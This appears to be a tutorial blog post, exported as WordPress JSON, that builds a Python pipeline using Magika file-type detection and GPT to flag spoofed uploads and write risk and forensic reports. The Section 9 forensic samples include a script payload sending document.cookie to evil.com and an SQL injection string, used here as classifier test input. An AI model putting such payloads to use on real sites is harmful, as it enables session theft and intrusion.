{"id":761,"date":"2026-04-20T02:38:58","date_gmt":"2026-04-19T18:38:58","guid":{"rendered":"https:\/\/connectword.dpdns.org\/?p=761"},"modified":"2026-04-20T02:38:58","modified_gmt":"2026-04-19T18:38:58","slug":"a-coding-implementation-to-build-an-ai-powered-file-type-detection-and-security-analysis-pipeline-with-magika-and-openai","status":"publish","type":"post","link":"https:\/\/connectword.dpdns.org\/?p=761","title":{"rendered":"A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI"},"content":{"rendered":"<p>In this tutorial, we build a workflow that combines <a href=\"https:\/\/github.com\/google\/magika\"><strong>Magika\u2019s<\/strong><\/a> deep-learning-based file type detection with OpenAI\u2019s language intelligence to create a practical and insightful analysis pipeline. We begin by setting up the required libraries, securely connecting to the OpenAI API, and initializing Magika to classify files directly from raw bytes rather than relying on filenames or extensions. As we move through the tutorial, we explore batch scanning, confidence modes, spoofed-file detection, forensic-style analysis, upload-pipeline risk scoring, and structured JSON reporting. At each stage, we use GPT to translate technical scan outputs into clear explanations, security insights, and executive-level summaries, allowing us to connect low-level byte detection with meaningful real-world interpretation.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-php\">!pip install magika openai -q\n\n\nimport os, io, json, zipfile, textwrap, hashlib, tempfile, getpass\nfrom pathlib import Path\nfrom collections import Counter\nfrom magika import Magika\nfrom magika.types import MagikaResult, PredictionMode\nfrom openai import OpenAI\n\n\nprint(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f511.png\" alt=\"\ud83d\udd11\" class=\"wp-smiley\" \/> Enter your OpenAI API key (input is hidden):\")\napi_key = getpass.getpass(\"OpenAI API Key: \")\nclient  = OpenAI(api_key=api_key)\n\n\ntry:\n   client.models.list()\n   print(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> OpenAI connected successfullyn\")\nexcept Exception as e:\n   raise SystemExit(f\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/274c.png\" alt=\"\u274c\" class=\"wp-smiley\" \/> OpenAI connection failed: {e}\")\n\n\nm = Magika()\nprint(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> Magika loaded successfullyn\")\nprint(f\"   module version : {m.get_module_version()}\")\nprint(f\"   model name     : {m.get_model_name()}\")\nprint(f\"   output types   : {len(m.get_output_content_types())} supported labelsn\")\n\n\ndef ask_gpt(system: str, user: str, model: str = \"gpt-4o\", max_tokens: int = 600) -&gt; str:\n   resp = client.chat.completions.create(\n       model=model,\n       max_tokens=max_tokens,\n       messages=[\n           {\"role\": \"system\", \"content\": system},\n           {\"role\": \"user\",   \"content\": user},\n       ],\n   )\n   return resp.choices[0].message.content.strip()\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 1 \u2014 Core API + GPT Plain-Language Explanation\")\nprint(\"=\" * 60)\n\n\nsamples = {\n   \"Python\":     b'import osndef greet(name):n    print(f\"Hello, {name}\")n',\n   \"JavaScript\": b'const fetch = require(\"node-fetch\");nasync function getData() { return await fetch(\"\/api\"); }',\n   \"CSV\":        b'name,age,citynAlice,30,NYCnBob,25,LAn',\n   \"JSON\":       b'{\"name\": \"Alice\", \"scores\": [10, 20, 30], \"active\": true}',\n   \"Shell\":      b'#!\/bin\/bashnecho \"Hello\"nfor i in $(seq 1 5); do echo $i; done',\n   \"PDF magic\":  b'%PDF-1.4n1 0 objn&lt;&lt; \/Type \/Catalog &gt;&gt;nendobjn',\n   \"ZIP magic\":  bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),\n}\n\n\nprint(f\"n{'Label':&lt;12} {'MIME Type':&lt;30} {'Score':&gt;6}\")\nprint(\"-\" * 52)\nmagika_labels = []\nfor name, raw in samples.items():\n   res = m.identify_bytes(raw)\n   magika_labels.append(res.output.label)\n   print(f\"{res.output.label:&lt;12} {res.output.mime_type:&lt;30} {res.score:&gt;5.1%}\")\n\n\nexplanation = ask_gpt(\n   system=\"You are a concise ML engineer. Explain in 4\u20135 sentences.\",\n   user=(\n       f\"Magika is Google's AI file-type detector. It just identified these types from raw bytes: \"\n       f\"{magika_labels}. Explain how a deep-learning model detects file types from \"\n       \"just bytes, and why this beats relying on file extensions.\"\n   ),\n   max_tokens=250,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT on how Magika works:n{textwrap.fill(explanation, 72)}n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 2 \u2014 Batch Identification + GPT Summary\")\nprint(\"=\" * 60)\n\n\ntmp_dir = Path(tempfile.mkdtemp())\nfile_specs = {\n   \"code.py\":     b\"import sysnprint(sys.version)n\",\n   \"style.css\":   b\"body { font-family: Arial; margin: 0; }n\",\n   \"data.json\":   b'[{\"id\": 1, \"val\": \"foo\"}, {\"id\": 2, \"val\": \"bar\"}]',\n   \"script.sh\":   b\"#!\/bin\/shnecho Hello Worldn\",\n   \"doc.html\":    b\"&lt;html&gt;&lt;body&gt;&lt;p&gt;Hello&lt;\/p&gt;&lt;\/body&gt;&lt;\/html&gt;\",\n   \"config.yaml\": b\"server:n  host: localhostn  port: 8080n\",\n   \"query.sql\":   b\"CREATE TABLE t (id INT PRIMARY KEY, name TEXT);n\",\n   \"notes.md\":    b\"# Headingnn- item onen- item twon\",\n}\n\n\npaths = []\nfor fname, content in file_specs.items():\n   p = tmp_dir \/ fname\n   p.write_bytes(content)\n   paths.append(p)\n\n\nresults       = m.identify_paths(paths)\nbatch_summary = [\n   {\"file\": p.name, \"label\": r.output.label,\n    \"group\": r.output.group, \"score\": f\"{r.score:.1%}\"}\n   for p, r in zip(paths, results)\n]\n\n\nprint(f\"n{'File':&lt;18} {'Label':&lt;14} {'Group':&lt;12} {'Score':&gt;6}\")\nprint(\"-\" * 54)\nfor row in batch_summary:\n   print(f\"{row['file']:&lt;18} {row['label']:&lt;14} {row['group']:&lt;12} {row['score']:&gt;6}\")\n\n\ngpt_summary = ask_gpt(\n   system=\"You are a DevSecOps expert. Be concise and practical.\",\n   user=(\n       f\"A file upload scanner detected these file types in a batch: \"\n       f\"{json.dumps(batch_summary)}. \"\n       \"In 3\u20134 sentences, summarise what kind of project this looks like \"\n       \"and flag any file types that might warrant extra scrutiny.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT project analysis:n{textwrap.fill(gpt_summary, 72)}n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We install the required libraries, connect Magika and OpenAI, and set up the core helper function that lets us send prompts for analysis. We begin by testing Magika on various raw byte samples to see how it identifies file types without relying on file extensions. We also create a batch of sample files and use GPT to summarize what kind of project or codebase the detected file collection appears to represent.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-php\">print(\"=\" * 60)\nprint(\"SECTION 3 \u2014 Prediction Modes + GPT Mode-Selection Guidance\")\nprint(\"=\" * 60)\n\n\nambiguous    = b\"Hello, world. This is a short text.\"\nmode_results = {}\n\n\nfor mode in [PredictionMode.HIGH_CONFIDENCE,\n            PredictionMode.MEDIUM_CONFIDENCE,\n            PredictionMode.BEST_GUESS]:\n   m_mode = Magika(prediction_mode=mode)\n   res    = m_mode.identify_bytes(ambiguous)\n   mode_results[mode.name] = {\n       \"label\": res.output.label,\n       \"score\": f\"{res.score:.1%}\",\n   }\n   print(f\"  {mode.name:&lt;22}  label={res.output.label:&lt;20} score={res.score:.1%}\")\n\n\nguidance = ask_gpt(\n   system=\"You are a security engineer. Be concise (3 bullet points).\",\n   user=(\n       f\"Magika's three confidence modes returned: {json.dumps(mode_results)} \"\n       \"for the same ambiguous text snippet. Give one practical use-case where each mode \"\n       \"(HIGH_CONFIDENCE, MEDIUM_CONFIDENCE, BEST_GUESS) is the right choice.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT on when to use each mode:n{guidance}n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 4 \u2014 MagikaResult Anatomy + GPT Field Explanation\")\nprint(\"=\" * 60)\n\n\ncode_snippet = b\"\"\"\n#!\/usr\/bin\/env python3\nfrom typing import List\n\n\ndef fibonacci(n: int) -&gt; List[int]:\n   a, b = 0, 1\n   result = []\n   for _ in range(n):\n       result.append(a)\n       a, b = b, a + b\n   return result\n\"\"\"\n\n\nres = m.identify_bytes(code_snippet)\nresult_dict = {\n   \"output.label\":       res.output.label,\n   \"output.description\": res.output.description,\n   \"output.mime_type\":   res.output.mime_type,\n   \"output.group\":       res.output.group,\n   \"output.extensions\":  res.output.extensions,\n   \"output.is_text\":     res.output.is_text,\n   \"dl.label\":           res.dl.label,\n   \"dl.description\":     res.dl.description,\n   \"dl.mime_type\":       res.dl.mime_type,\n   \"score\":              round(res.score, 4),\n}\nfor k, v in result_dict.items():\n   print(f\"  {k:&lt;28} = {v}\")\n\n\nfield_explanation = ask_gpt(\n   system=\"You are a concise ML engineer.\",\n   user=(\n       f\"Magika returned this result object for a Python file: {json.dumps(result_dict)}. \"\n       \"In 4 sentences, explain the difference between the `dl.*` fields and `output.*` fields, \"\n       \"and why dl.label and output.label might differ even though there is only one score.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT explains dl vs output:n{textwrap.fill(field_explanation, 72)}n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 5 \u2014 Spoofed Files + GPT Threat Assessment\")\nprint(\"=\" * 60)\n\n\nspoofed_files = {\n   \"invoice.pdf\":  b'#!\/usr\/bin\/env python3nprint(\"I am Python, not a PDF!\")n',\n   \"photo.jpg\":    b'&lt;html&gt;&lt;body&gt;This is HTML masquerading as JPEG&lt;\/body&gt;&lt;\/html&gt;',\n   \"data.csv\":     bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),\n   \"readme.txt\":   b'%PDF-1.4n1 0 objn&lt;&lt;\/Type \/Catalog&gt;&gt;nendobjn',\n   \"legit.py\":     b'import sysnprint(sys.argv)n',\n}\next_to_expected = {\"pdf\": \"pdf\", \"jpg\": \"jpeg\", \"csv\": \"zip\", \"txt\": \"pdf\", \"py\": \"python\"}\n\n\nthreats = []\nprint(f\"n{'Filename':&lt;18} {'Expected':^10} {'Detected':^14} {'Match':^6}  {'Score':&gt;6}\")\nprint(\"-\" * 62)\nfor fname, content in spoofed_files.items():\n   ext      = fname.rsplit(\".\", 1)[-1]\n   expected = ext_to_expected.get(ext, ext)\n   res      = m.identify_bytes(content)\n   detected = res.output.label\n   match    = \"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/>\" if detected == expected else \"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f6a8.png\" alt=\"\ud83d\udea8\" class=\"wp-smiley\" \/>\"\n   if detected != expected:\n       threats.append({\"file\": fname, \"claimed_ext\": ext, \"actual_type\": detected})\n   print(f\"{fname:&lt;18} {expected:^10} {detected:^14} {match:^6}  {res.score:&gt;5.1%}\")\n\n\nthreat_report = ask_gpt(\n   system=\"You are a SOC analyst. Be specific and concise.\",\n   user=(\n       f\"Magika detected these extension-spoofed files: {json.dumps(threats)}. \"\n       \"For each mismatch, describe in one sentence what the likely threat vector is \"\n       \"and what action a security team should take.\"\n   ),\n   max_tokens=300,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT threat assessment:n{threat_report}n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We explore Magika\u2019s prediction modes and compare how different confidence settings behave when the input is ambiguous. We then inspect the structure of the Magika result object in detail to understand the distinction between processed output fields and raw model fields. After that, we test spoofed files with misleading extensions and use GPT to explain the likely threat vectors and recommended security responses.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-php\">print(\"=\" * 60)\nprint(\"SECTION 6 \u2014 Corpus Distribution + GPT Insight\")\nprint(\"=\" * 60)\n\n\ncorpus = [\n   b\"SELECT * FROM orders WHERE status='open';\",\n   b\"&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;page&lt;\/body&gt;&lt;\/html&gt;\",\n   b\"import numpy as npnprint(np.zeros(10))\",\n   b\"body { color: red; }\",\n   b'{\"key\": \"value\"}',\n   b\"name,scorenAlice,95nBob,87\",\n   b\"# Titlen## Sectionn- bullet\",\n   b\"echo hellonls -la\",\n   b\"const x = () =&gt; 42;\",\n   b\"package mainnimport \"fmt\"nfunc main() { fmt.Println(\"Go\") }\",\n   b\"public class Hello { public static void main(String[] a) {} }\",\n   b\"fn main() { println!(\"Rust!\"); }\",\n   b\"#!\/usr\/bin\/env rubynputs 'hello'\",\n   b\"&lt;?php echo 'Hello World'; ?&gt;\",\n   b\"[section]nkey=valuenanother=thing\",\n   b\"FROM python:3.11nCOPY . \/appnCMD python app.py\",\n   b\"apiVersion: v1nkind: Podnmetadata:n  name: test\",\n]\n\n\nall_results  = [m.identify_bytes(b) for b in corpus]\ngroup_counts = Counter(r.output.group for r in all_results)\nlabel_counts = Counter(r.output.label for r in all_results)\n\n\nprint(\"nBy GROUP:\")\nfor grp, cnt in sorted(group_counts.items(), key=lambda x: -x[1]):\n   print(f\"  {grp:&lt;12} {'\u2588' * cnt} ({cnt})\")\n\n\nprint(\"nBy LABEL:\")\nfor lbl, cnt in sorted(label_counts.items(), key=lambda x: -x[1]):\n   print(f\"  {lbl:&lt;18} {cnt}\")\n\n\ndistribution = {\"groups\": dict(group_counts), \"labels\": dict(label_counts)}\ninsight = ask_gpt(\n   system=\"You are a staff engineer reviewing a code repository. Be concise.\",\n   user=(\n       f\"A file scanner found this type distribution: {json.dumps(distribution)}. \"\n       \"In 3\u20134 sentences, describe what kind of repository this is, \"\n       \"and suggest one thing to watch out for from a maintainability perspective.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT repository insight:n{textwrap.fill(insight, 72)}n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 7 \u2014 Minimum Bytes Needed + GPT Explanation\")\nprint(\"=\" * 60)\n\n\nfull_python = b\"#!\/usr\/bin\/env python3nimport os, sysnprint('hello')n\" * 10\nprobe_data  = {}\nprint(f\"nFull content size: {len(full_python)} bytes\")\nprint(f\"n{'Prefix (bytes)':&lt;18} {'Label':&lt;14} {'Score':&gt;6}\")\nprint(\"-\" * 40)\nfor size in [4, 8, 16, 32, 64, 128, 256, 512]:\n   res = m.identify_bytes(full_python[:size])\n   probe_data[str(size)] = {\"label\": res.output.label, \"score\": round(res.score, 3)}\n   print(f\"  first {size:&lt;10}  {res.output.label:&lt;14} {res.score:&gt;5.1%}\")\n\n\nprobe_insight = ask_gpt(\n   system=\"You are a concise ML engineer.\",\n   user=(\n       f\"Magika's identification of a Python file at different byte-prefix lengths: \"\n       f\"{json.dumps(probe_data)}. \"\n       \"In 3 sentences, explain why a model can identify file types from so few bytes, \"\n       \"and what architectural choices make this possible.\"\n   ),\n   max_tokens=200,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT on byte-level detection:n{textwrap.fill(probe_insight, 72)}n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We analyze a mixed corpus of code and configuration content to understand the distribution of detected file groups and labels across a repository-like dataset. We use these results to let GPT infer the repository\u2019s nature and highlight maintainability concerns based on the detected composition. We also probe how many bytes Magika needs for identification and examine how early byte-level patterns can still reveal file identity with useful confidence.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-php\">print(\"=\" * 60)\nprint(\"SECTION 8 \u2014 Upload Scanner Pipeline + GPT Risk Scoring\")\nprint(\"=\" * 60)\n\n\nupload_dir = Path(tempfile.mkdtemp()) \/ \"uploads\"\nupload_dir.mkdir()\nuploads = {\n   \"report.pdf\":      b'%PDF-1.4n1 0 objn&lt;&lt;\/Type \/Catalog&gt;&gt;nendobjn',\n   \"data_export.csv\": b\"id,name,emailn1,Alice,a@x.comn2,Bob,b@x.comn\",\n   \"setup.sh\":        b\"#!\/bin\/bashnapt-get update &amp;&amp; apt-get install -y curln\",\n   \"config.json\":     b'{\"debug\": true, \"workers\": 4}',\n   \"malware.exe\":     bytes([0x4D, 0x5A]) + bytes(100),\n   \"index.html\":      b\"&lt;html&gt;&lt;body&gt;Hello&lt;\/body&gt;&lt;\/html&gt;\",\n   \"main.py\":         b\"from flask import Flasknapp = Flask(__name__)n\",\n   \"suspicious.txt\":  bytes([0x4D, 0x5A]) + bytes(50),\n}\n\n\nfor fname, content in uploads.items():\n   (upload_dir \/ fname).write_bytes(content)\n\n\nall_paths     = list(upload_dir.iterdir())\nbatch_results = m.identify_paths(all_paths)\n\n\nBLOCKED_LABELS = {\"pe\", \"elf\", \"macho\"}\next_map        = {\"pdf\": \"pdf\", \"csv\": \"csv\", \"sh\": \"shell\", \"json\": \"json\",\n                 \"exe\": \"pe\", \"html\": \"html\", \"py\": \"python\", \"txt\": \"txt\"}\n\n\nscan_results = []\nprint(f\"n{'File':&lt;22} {'Label':&lt;16} {'Score':&gt;6}  {'Status'}\")\nprint(\"-\" * 65)\nfor path, res in zip(all_paths, batch_results):\n   o        = res.output\n   ext      = path.suffix.lstrip(\".\")\n   expected = ext_map.get(ext, \"\")\n   mismatch = expected and (o.label != expected)\n\n\n   if o.label in BLOCKED_LABELS:\n       status = \"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f6ab.png\" alt=\"\ud83d\udeab\" class=\"wp-smiley\" \/> BLOCKED\"\n   elif mismatch:\n       status = f\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/26a0.png\" alt=\"\u26a0\" class=\"wp-smiley\" \/>  MISMATCH (ext:{expected})\"\n   else:\n       status = \"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> OK\"\n\n\n   scan_results.append({\n       \"file\":   path.name,\n       \"label\":  o.label,\n       \"group\":  o.group,\n       \"score\":  round(res.score, 3),\n       \"status\": status.replace(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f6ab.png\" alt=\"\ud83d\udeab\" class=\"wp-smiley\" \/> \", \"\").replace(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/26a0.png\" alt=\"\u26a0\" class=\"wp-smiley\" \/>  \", \"\").replace(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> \", \"\"),\n   })\n   print(f\"{path.name:&lt;22} {o.label:&lt;16} {res.score:&gt;5.1%}  {status}\")\n\n\nrisk_report = ask_gpt(\n   system=\"You are a senior security analyst. Be structured and actionable.\",\n   user=(\n       f\"A file upload scanner produced these results: {json.dumps(scan_results)}. \"\n       \"Provide a 5-sentence risk summary: identify the highest-risk files, \"\n       \"explain why they're risky, and give concrete remediation steps.\"\n   ),\n   max_tokens=350,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT risk report:n{risk_report}n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 9 \u2014 Forensics + GPT IOC Narrative\")\nprint(\"=\" * 60)\n\n\nforensic_samples = [\n   (\"sample_A\", b\"import renpattern = re.compile(r'\\d+')n\"),\n   (\"sample_B\", b'{\"attack\": \"sqli\", \"payload\": \"1 OR 1=1\"}'),\n   (\"sample_C\", bytes([0xFF, 0xD8, 0xFF, 0xE0]) + b\"JFIF\" + bytes(50)),\n   (\"sample_D\", b\"&lt;script&gt;document.location='http:\/\/evil.com?c='+document.cookie&lt;\/script&gt;\"),\n   (\"sample_E\", b\"MZ\" + bytes(100)),\n]\n\n\nioc_data = []\nprint(f\"n{'Name':&lt;12} {'SHA256':18} {'Label':&lt;14} {'MIME':&lt;28} {'is_text'}\")\nprint(\"-\" * 80)\nfor name, content in forensic_samples:\n   sha = hashlib.sha256(content).hexdigest()[:16]\n   res = m.identify_bytes(content)\n   o   = res.output\n   ioc_data.append({\n       \"id\":            name,\n       \"sha256_prefix\": sha,\n       \"label\":         o.label,\n       \"mime\":          o.mime_type,\n       \"is_text\":       o.is_text,\n   })\n   print(f\"{name:&lt;12} {sha:&lt;18} {o.label:&lt;14} {o.mime_type:&lt;28} {o.is_text}\")\n\n\nioc_narrative = ask_gpt(\n   system=\"You are a threat intelligence analyst writing an incident report.\",\n   user=(\n       f\"During a forensic investigation, these file samples were recovered: \"\n       f\"{json.dumps(ioc_data)}. \"\n       \"Write a concise 5-sentence Indicators of Compromise (IOC) narrative \"\n       \"describing the likely attack chain and what each sample represents.\"\n   ),\n   max_tokens=350,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT IOC narrative:n{ioc_narrative}n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We simulate a real upload-scanning pipeline that classifies files, compares detected types against expected extensions, and decides whether each file should be allowed, flagged, or blocked. We then move into a forensic scenario in which we generate SHA-256 prefixes, inspect MIME types, and create structured indicators from recovered file samples. Throughout both parts, we use GPT to convert technical scan results into practical risk summaries and concise IOC-style incident narratives.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-php\">print(\"=\" * 60)\nprint(\"SECTION 10 \u2014 JSON Report + GPT Executive Summary\")\nprint(\"=\" * 60)\n\n\nexport_samples = {\n   \"api.py\":      b\"from fastapi import FastAPInapp = FastAPI()n@app.get('\/')ndef root(): return {}n\",\n   \"schema.sql\":  b\"CREATE TABLE users (id SERIAL PRIMARY KEY, email TEXT UNIQUE);n\",\n   \"deploy.yaml\": b\"name: deploynon: pushnjobs:n  build:n    runs-on: ubuntu-latestn\",\n   \"evil.exe\":    bytes([0x4D, 0x5A]) + bytes(100),\n   \"spoof.pdf\":   b'#!\/usr\/bin\/env python3nprint(\"not a pdf\")n',\n}\n\n\nreport = []\nfor name, content in export_samples.items():\n   res = m.identify_bytes(content)\n   o   = res.output\n   report.append({\n       \"filename\":    name,\n       \"label\":       o.label,\n       \"description\": o.description,\n       \"mime_type\":   o.mime_type,\n       \"group\":       o.group,\n       \"is_text\":     o.is_text,\n       \"dl_label\":    res.dl.label,\n       \"score\":       round(res.score, 4),\n   })\n\n\nprint(json.dumps(report, indent=2))\n\n\nexec_summary = ask_gpt(\n   system=\"You are a CISO writing a two-paragraph executive summary. Be clear and non-technical.\",\n   user=(\n       f\"An AI file scanner analysed these files: {json.dumps(report)}. \"\n       \"Write a two-paragraph executive summary: paragraph 1 covers what was found \"\n       \"and the overall risk posture; paragraph 2 gives recommended next steps.\"\n   ),\n   max_tokens=400,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT executive summary:n{exec_summary}n\")\n\n\nout_path = \"\/tmp\/magika_openai_report.json\"\nwith open(out_path, \"w\") as f:\n   json.dump({\"scan_results\": report, \"executive_summary\": exec_summary}, f, indent=2)\nprint(f\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4be.png\" alt=\"\ud83d\udcbe\" class=\"wp-smiley\" \/> Full report saved to: {out_path}\")\n\n\nprint(\"n\" + \"=\" * 60)\nprint(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> Magika + OpenAI Tutorial Complete!\")\nprint(\"=\" * 60)\nprint(\"\"\"\nAll fixes applied (magika 1.0.2):\n \u2717 from magika import MagikaConfig    \u2192 removed (never existed)\n \u2717 MagikaConfig(prediction_mode=m)   \u2192 Magika(prediction_mode=m)\n \u2717 m.get_model_version()             \u2192 m.get_model_name()\n \u2717 res.output_score                  \u2192 res.score\n \u2717 res.dl_score \/ res.dl.score       \u2192 res.score  (score only lives on MagikaResult)\n\n\nMagikaResult field map (1.0.2):\n res.score           \u2190 the one and only confidence score\n res.output.label    \u2190 final label after threshold logic   (use this)\n res.dl.label        \u2190 raw model label before thresholding (for debugging)\n res.output.*        \u2190 description, mime_type, group, extensions, is_text\n res.dl.*            \u2190 same fields but from the raw model output\n\n\nSections:\n \u00a71   Core API (bytes\/path\/stream)         + GPT explains Magika's ML approach\n \u00a72   Batch scanning                       + GPT project-type analysis\n \u00a73   Confidence modes via constructor arg + GPT when-to-use guidance\n \u00a74   MagikaResult anatomy                 + GPT explains dl vs output fields\n \u00a75   Spoofed-file detection               + GPT threat assessment per mismatch\n \u00a76   Corpus distribution                  + GPT repository insight\n \u00a77   Byte-prefix probing                  + GPT explains byte-level detection\n \u00a78   Upload pipeline (allow\/block\/flag)   + GPT risk report\n \u00a79   Forensics hash+type fingerprinting   + GPT IOC narrative\n\u00a710   JSON report export                   + GPT CISO executive summary\n\"\"\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We build a structured JSON report from multiple analyzed files and capture key metadata, including labels, MIME types, text status, and model confidence scores. We then use GPT to produce a non-technical executive summary that explains the overall findings, risk posture, and recommended next steps in a way that leadership can understand. Finally, we export the results to a JSON file and print a completion summary that reinforces the Magika 1.0.2 fixes and the full scope of the 